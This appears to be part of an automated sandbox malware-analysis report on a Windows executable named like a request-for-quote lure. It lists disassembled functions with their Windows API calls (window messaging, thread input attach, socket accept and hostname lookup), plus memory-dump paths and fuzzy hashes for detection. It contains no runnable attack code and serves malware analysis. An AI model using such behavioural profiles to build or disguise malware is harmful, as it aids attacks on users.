                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: CreateHardLink$DeleteErrorFileLast
                                                        • String ID:
                                                        • API String ID: 3321077145-0
                                                        • Opcode ID: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                        • Instruction ID: 6818256dd78c2cb29ac0ce267de24fb792dca3a41353b59757f5ace631f71379
                                                        • Opcode Fuzzy Hash: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                        • Instruction Fuzzy Hash: DC318DB1A00201EBDB10EFB5C945A1ABBE8AF45319F10885EFC44AB343CB79ED45CB94
                                                        Function 0042083F Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
                                                        • __isleadbyte_l.LIBCMT ref: 004208A6
                                                        • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
                                                        • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                        • String ID:
                                                        • API String ID: 3058430110-0
                                                        • Opcode ID: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                        • Instruction ID: f6550d230e50e909e13d2a99824cc28569674f7a7b9e5ef0daa2e7ce22e82e6e
                                                        • Opcode Fuzzy Hash: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                        • Instruction Fuzzy Hash: D731E231B00265EFDB20EF65E884AAF3BE5BF00310F55496AE4658B292D734CD80DB98
                                                        Function 0045039B Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetParent.USER32(?), ref: 004503C8
                                                        • DefDlgProcW.USER32(?,00000138,?,?), ref: 00450417
                                                        • DefDlgProcW.USER32(?,00000133,?,?), ref: 00450466
                                                        • DefDlgProcW.USER32(?,00000134,?,?), ref: 00450497
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Proc$Parent
                                                        • String ID:
                                                        • API String ID: 2351499541-0
                                                        • Opcode ID: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                        • Instruction ID: 48835c6935d03606f494e5d0f95072c3389227be5880c4b08380f2331de9f088
                                                        • Opcode Fuzzy Hash: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                        • Instruction Fuzzy Hash: F231B73A2001046BD720CF18DC94DAB7719EF97335B14461BFA298B3D3CB759856C769
                                                        Function 00442A83 Relevance: 6.1, APIs: 4, Instructions: 87windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
                                                        • TranslateMessage.USER32(?), ref: 00442B01
                                                        • DispatchMessageW.USER32(?), ref: 00442B0B
                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Message$Peek$DispatchTranslate
                                                        • String ID:
                                                        • API String ID: 1795658109-0
                                                        • Opcode ID: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                        • Instruction ID: 5e5183f3b0572ad37d893cec5a7cf9421d6c1ddc4b80b1975d6d8daaa3c1acd1
                                                        • Opcode Fuzzy Hash: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                        • Instruction Fuzzy Hash: 012126719583469AFB30DF649D85FB7BBA8CB24314F40407BF91097281EAB86848C769
                                                        Function 0047438B Relevance: 6.1, APIs: 4, Instructions: 83COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetForegroundWindow.USER32(?,?,?), ref: 0047439C
                                                          • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                          • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                          • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                        • GetCaretPos.USER32(?), ref: 004743B2
                                                        • ClientToScreen.USER32(00000000,?), ref: 004743E8
                                                        • GetForegroundWindow.USER32 ref: 004743EE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                        • String ID:
                                                        • API String ID: 2759813231-0
                                                        • Opcode ID: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                        • Instruction ID: 29594bdffde582d62cf8cb535202cb0f6e37f5c0e74140e0e8dac686a3932322
                                                        • Opcode Fuzzy Hash: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                        • Instruction Fuzzy Hash: 2F21AC71A00305ABD710EF75CC86B9E77B9AF44708F14446EF644BB2C2DBF9A9408BA5
                                                        Function 004494A5 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                        • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 00449507
                                                        • _wcslen.LIBCMT ref: 00449519
                                                        • _wcslen.LIBCMT ref: 00449526
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: MessageSend_wcslen$_wcspbrk
                                                        • String ID:
                                                        • API String ID: 2886238975-0
                                                        • Opcode ID: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                        • Instruction ID: 7d4d19c59aaf55394df3596c947b25f6969e765268ec3300c5285dc4bbf20b28
                                                        • Opcode Fuzzy Hash: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                        • Instruction Fuzzy Hash: F7213A76B00208A6E730DF55ED81BEFB368EBA0310F10416FFF0896240E6794D55C799
                                                        Function 0046888B Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: __setmode$DebugOutputString_fprintf
                                                        • String ID:
                                                        • API String ID: 1792727568-0
                                                        • Opcode ID: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                                                        • Instruction ID: 94d91137fd77379d51e6296772f15362c7f2cf1f8b16651245aa9cc134f84072
                                                        • Opcode Fuzzy Hash: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                                                        • Instruction Fuzzy Hash: 5411A1B2D0020477DB107BB69C469AF7B2C8B55728F04416EF91573243E97C6A4947AB
                                                        Function 0047A26A Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                        • GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A2FA
                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A312
                                                        • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Window$Long$AttributesLayered
                                                        • String ID:
                                                        • API String ID: 2169480361-0
                                                        • Opcode ID: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                        • Instruction ID: 4b457c036b32d13d4d6aa44b7b333d7b15c6210fa1ac615a770d46c951a2b689
                                                        • Opcode Fuzzy Hash: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                        • Instruction Fuzzy Hash: E321C3322045146BD310AB19EC45F9BB798EF81334F20862BF859E72D1C779A855C7AC
                                                        Function 00434CC9 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 75stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
                                                          • Part of subcall function 00434C09: lstrcpyW.KERNEL32(00000000,?), ref: 00434C44
                                                          • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
                                                        • lstrlenW.KERNEL32(?), ref: 00434CF6
                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                        • lstrcpyW.KERNEL32(00000000,?), ref: 00434D1E
                                                        • lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: lstrcmpilstrcpylstrlen$_malloc
                                                        • String ID: cdecl
                                                        • API String ID: 3850814276-3896280584
                                                        • Opcode ID: 6cbd38251dd4a86e43de7c927aee515647cd65b84628e0119afa42224a7639cc
                                                        • Instruction ID: b4b7f9d7485e9dcc41445171e378d0673d7e4b3d8a31a27b28546bfa00bfc119
                                                        • Opcode Fuzzy Hash: 6cbd38251dd4a86e43de7c927aee515647cd65b84628e0119afa42224a7639cc
                                                        • Instruction Fuzzy Hash: 1521D276200301ABD710AF25DC45AEBB3A9FF99354F10583FF90687250EB39E945C7A9
                                                        Function 0046D402 Relevance: 6.1, APIs: 4, Instructions: 73networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                        • gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046D42D
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 0046D439
                                                        • _memmove.LIBCMT ref: 0046D475
                                                        • inet_ntoa.WSOCK32(?), ref: 0046D481
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
                                                        • String ID:
                                                        • API String ID: 2502553879-0
                                                        • Opcode ID: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                                        • Instruction ID: 24c3f219ec43f49587972b4c28f02db1d16d05b11a5808876a7c02c26e676da9
                                                        • Opcode Fuzzy Hash: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                                        • Instruction Fuzzy Hash: A7216F769001046BC700FBA6DD85C9FB7BCEF48318B10486BFC01B7241DA39EE058BA5
                                                        Function 00448C3C Relevance: 6.1, APIs: 4, Instructions: 72windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32 ref: 00448C69
                                                        • GetWindowLongW.USER32(?,000000EC), ref: 00448C91
                                                        • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448CCA
                                                        • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D13
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$LongWindow
                                                        • String ID:
                                                        • API String ID: 312131281-0
                                                        • Opcode ID: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                        • Instruction ID: 9d65767971b32091eca868ce8e4b461936feaca2c152e776436a997c982fc1ac
                                                        • Opcode Fuzzy Hash: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                        • Instruction Fuzzy Hash: 782186711193009BE3209F18DD88B9FB7E4FBD5325F140B1EF994962D0DBB58448C755
                                                        Function 00458A61 Relevance: 6.1, APIs: 4, Instructions: 71networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
                                                        • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
                                                        • accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00458B03
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: ErrorLastacceptselect
                                                        • String ID:
                                                        • API String ID: 385091864-0
                                                        • Opcode ID: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                        • Instruction ID: 6dce411450cb473f00463c700f03c36a20fe0f69cdcaeecb298670ce0bdbd9a3
                                                        • Opcode Fuzzy Hash: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                        • Instruction Fuzzy Hash: 032192716002049FD714EF69DD45BAAB7E8EB94310F10866EF988DB380DBB4A9808B94
                                                        Function 004368A0 Relevance: 6.1, APIs: 4, Instructions: 69windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID:
                                                        • API String ID: 3850602802-0
                                                        • Opcode ID: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                        • Instruction ID: 15055718653181d31d708d6839b45d2b231db9ad4f5f2f8f789da6f3b04ac486
                                                        • Opcode Fuzzy Hash: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                        • Instruction Fuzzy Hash: A7111275640208BFDB10DF68DC85F9AB7E8EF98750F11815AFD48DB340D6B1A9418FA0
                                                        Function 004301F8 Relevance: 6.1, APIs: 4, Instructions: 57windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00400000,00000000), ref: 00430242
                                                        • GetStockObject.GDI32(00000011), ref: 00430258
                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
                                                        • ShowWindow.USER32(00000000,00000000), ref: 0043027D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Window$CreateMessageObjectSendShowStock
                                                        • String ID:
                                                        • API String ID: 1358664141-0
                                                        • Opcode ID: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                        • Instruction ID: 87b955557270564ac2446a75def7de819d41fbc8528d619d8765837e6f615a12
                                                        • Opcode Fuzzy Hash: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                        • Instruction Fuzzy Hash: BD115172600504ABD755CF99DC59FDBB769AF8DB10F148319BA08932A0D774EC41CBA8
                                                        Function 00443C87 Relevance: 6.1, APIs: 4, Instructions: 57synchronizationthreadwindowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCurrentThreadId.KERNEL32 ref: 00443CA6
